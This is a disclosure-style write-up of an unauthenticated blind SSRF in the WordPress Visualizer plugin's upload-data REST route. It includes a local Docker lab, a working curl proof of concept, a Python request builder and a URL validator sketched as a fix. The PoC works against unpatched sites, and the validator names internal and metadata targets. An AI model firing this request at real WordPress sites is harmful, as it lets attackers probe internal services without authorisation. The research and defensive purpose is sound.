The Visualizer plugin for WordPress suffers from an unauthenticated blind SSRF vulnerability: the REST route /wp-json/visualizer/v1/upload-data accepts a JSON body containing a URL and fetches it server-side without authentication. This was tested against v3.3.0.
Set up a Docker environment using the compose config at https://docs.docker.com/compose/wordpress/. However, rather than running docker-compose up -d, just run docker-compose up (no -d) so the containers stay in the foreground, as we want to see the output from the MySQL server to prove the SSRF.
Go through the standard WordPress install process, then install the Visualizer plugin (it should be the first result when you search for "Visualizer" under Plugins > Add New) and activate it.
To enable the /wp-json/ URL style used in the PoC below, you'll also want to change the permalink structure to something other than "Plain" under Settings > Permalinks.
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.158.128:8000' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Content-type: application/json' -H $'Content-Length: 24' \
--data-binary $'{\"url\":\"http://db:3306\"}' \
$'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'
Note: 192.168.158.128 was the IP of my Docker host, so you'll probably have to change it (in both the Host header and the request URL).
If you execute this curl command with the docker-compose output visible, you should see the db_1 container log something like:
db_1 | 2019-09-19T10:31:56.474241Z 279 [Note] Got packets out of order
This is the result of the payload {"url":"http://db:3306"} in the POST body, which instructs the plugin to load a CSV file from http://db:3306, the address of the local MySQL container (the compose file names the service db, so Docker's internal DNS resolves it). MySQL received the plugin's HTTP request on its protocol port and logged it as out-of-order packets; no data comes back to the attacker, which is what makes this a blind SSRF, but the log line proves the server-side request was made.
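The following is an added example, not code from the advisory or from the Visualizer plugin. It does two things: it builds the same PoC request as the curl command above (so the Content-Length is derived rather than hard-coded), and it shows the kind of server-side URL check a fix for a user-supplied-URL fetch needs, rejecting non-http(s) schemes, non-standard ports, and any hostname that resolves to a non-public address. The FAKE_DNS map, the 172.18.0.2 address for the db service and the 93.184.216.34 address for example.com are constructed stand-ins so the check runs offline; the helper names are my own.

```python
"""Added example: PoC request builder plus the URL validation a fix needs.
Not from the advisory or the plugin. FAKE_DNS values are constructed."""
import ipaddress
import json
import urllib.request
from urllib.parse import urlsplit

# Constructed view of the docker-compose network: "db" is the MySQL service
# and gets a bridge-network address (the exact value here is assumed).
FAKE_DNS = {
    "db": ["172.18.0.2"],
    "example.com": ["93.184.216.34"],
}


def fake_resolver(hostname):
    """Offline stand-in for socket.getaddrinfo; returns a list of IP strings."""
    return FAKE_DNS.get(hostname, [])


def build_poc_request(docker_host, target_url="http://db:3306"):
    """Build the request from the write-up for a WordPress instance reachable at
    docker_host (e.g. "192.168.158.128:8000"). Returns (endpoint, headers, body)."""
    body = json.dumps({"url": target_url}, separators=(",", ":")).encode()
    headers = {
        "Host": docker_host,
        "Content-Type": "application/json",
        "Content-Length": str(len(body)),  # 24 for the default payload
    }
    endpoint = f"http://{docker_host}/wp-json/visualizer/v1/upload-data"
    return endpoint, headers, body


def send_poc(docker_host, target_url="http://db:3306", timeout=10):
    """Fire the PoC. The SSRF is blind: the evidence is the db container's
    "Got packets out of order" log line, not anything in the HTTP response."""
    endpoint, headers, body = build_poc_request(docker_host, target_url)
    req = urllib.request.Request(endpoint, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def is_safe_fetch_url(url, resolver=fake_resolver, allowed_ports=(80, 443)):
    """Check a user-supplied URL before the server fetches it.

    Rejects: non-http(s) schemes, missing host, ports outside allowed_ports
    (which alone blocks http://db:3306), unresolvable names (fail closed), and
    any hostname or IP literal that is not globally routable (loopback, RFC1918,
    link-local such as 169.254.169.254, etc.). All resolved addresses must pass."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        port = parts.port
    except ValueError:  # malformed port
        return False
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in allowed_ports:
        return False
    try:
        addrs = [str(ipaddress.ip_address(parts.hostname))]  # IP literal
    except ValueError:
        addrs = resolver(parts.hostname)
    if not addrs:
        return False
    return all(ipaddress.ip_address(a).is_global for a in addrs)


if __name__ == "__main__":
    import sys
    # Pass your Docker host (e.g. 192.168.158.128:8000) to actually send the PoC.
    if len(sys.argv) > 1:
        print("HTTP", send_poc(sys.argv[1]))
    for u in ("http://db:3306", "http://db/", "http://169.254.169.254/",
              "https://example.com/data.csv"):
        print(u, "allowed" if is_safe_fetch_url(u) else "blocked")
```

The check resolves the hostname and then the fetch would resolve it again, so a hostile DNS server could answer differently the second time (rebinding); a production fix should connect to the address it validated rather than re-resolving, and should also re-validate any redirect target.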